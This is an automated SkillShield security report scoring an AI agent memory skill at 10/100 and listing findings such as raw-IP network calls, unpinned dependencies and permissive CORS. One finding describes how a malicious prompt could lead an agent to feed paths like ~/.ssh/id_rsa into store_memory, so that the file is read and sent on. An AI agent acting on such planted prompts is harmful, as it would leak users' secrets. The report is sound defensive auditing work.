Trust Assessment
agent-memory-improved received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 13 findings: 5 critical, 4 high, 4 medium, and 0 low severity. Key findings include Network egress to untrusted endpoints, Suspicious import: requests, Potential data exfiltration: file read + network send.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Manifest Analysis layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings13
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client.py:22 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client_original.py:22 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/lucaspdude/persistent-private-agent-memory/scripts/setup.sh:41 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/lucaspdude/persistent-private-agent-memory/scripts/setup.sh:50 | |
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/lucaspdude/persistent-private-agent-memory/scripts/start.sh:32 | |
| HIGH | Potential data exfiltration: file read + network send Function 'store_memory' reads files and sends data over the network. This may indicate data exfiltration. Review this function to ensure file contents are not being sent to external servers. | Static | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client.py:121 | |
| HIGH | Potential data exfiltration: file read + network send Function 'store_memory' reads files and sends data over the network. This may indicate data exfiltration. Review this function to ensure file contents are not being sent to external servers. | Static | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client_original.py:121 | |
| HIGH | Arbitrary file read via user-controlled path in `store_memory` The `store_memory` function in `scripts/memory_client.py` accepts a `--file` argument, allowing it to read the content of any file specified by the user. If an AI agent is prompted to store memory and a malicious prompt provides a path to a sensitive file (e.g., `/etc/passwd`, `~/.ssh/id_rsa`), the content of that file will be read, base64 encoded, and sent to the local memory service. Although the service is local, this constitutes a data exfiltration risk from the agent's perspective, as it can be tricked into revealing local file contents. Implement strict validation or sandboxing for `file_path` arguments. Only allow reading from a predefined, safe directory, or prompt the user for explicit confirmation before reading from arbitrary paths. For an AI agent, this means ensuring the agent cannot be prompted to provide arbitrary file paths. | LLM | scripts/memory_client.py:100 | |
| HIGH | Unpinned dependencies in `scripts/setup.sh` The `scripts/setup.sh` script installs Python dependencies (`fastapi`, `uvicorn`, `cryptography`, `mnemonic`) without specifying exact versions. This introduces a supply chain risk, as a future malicious or vulnerable version of any of these packages could be installed, compromising the client environment. While `assets/service/requirements.txt` pins versions for the service, the `setup.sh` script's `pip install` command does not respect this for the client-side tools or if the service is installed via `setup.sh` directly. Pin all dependencies to specific versions (e.g., `fastapi==0.115.6`) in `scripts/setup.sh` or ensure it installs from a `requirements.txt` file that has pinned versions. | LLM | scripts/setup.sh:15 | |
| MEDIUM | Suspicious import: requests Import of 'requests' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client.py:10 | |
| MEDIUM | Suspicious import: requests Import of 'requests' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/lucaspdude/persistent-private-agent-memory/scripts/memory_client_original.py:10 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/lucaspdude/persistent-private-agent-memory/scripts/setup.sh:33 | |
| MEDIUM | Overly permissive CORS policy in local service The FastAPI service in `assets/service/main.py` is configured with `CORSMiddleware` allowing all origins (`allow_origins=["*"]`), all methods, and all headers. While the service is intended to run locally and bind to `127.0.0.1`, this overly permissive CORS policy could become a vulnerability if the service were ever accidentally exposed to the network or if a malicious web page could trick a browser into making requests to `localhost`. It's an unnecessary security relaxation even for a local-only service. Restrict `allow_origins` to specific, known origins (e.g., `["http://localhost:8000"]` or `["http://127.0.0.1:8000"]`) or remove the middleware entirely if cross-origin requests are not expected for a local-only service. | LLM | assets/service/main.py:190 |
Scan History
Embed Code
[](https://skillshield.io/report/36e49acb68c446a1)
Powered by SkillShield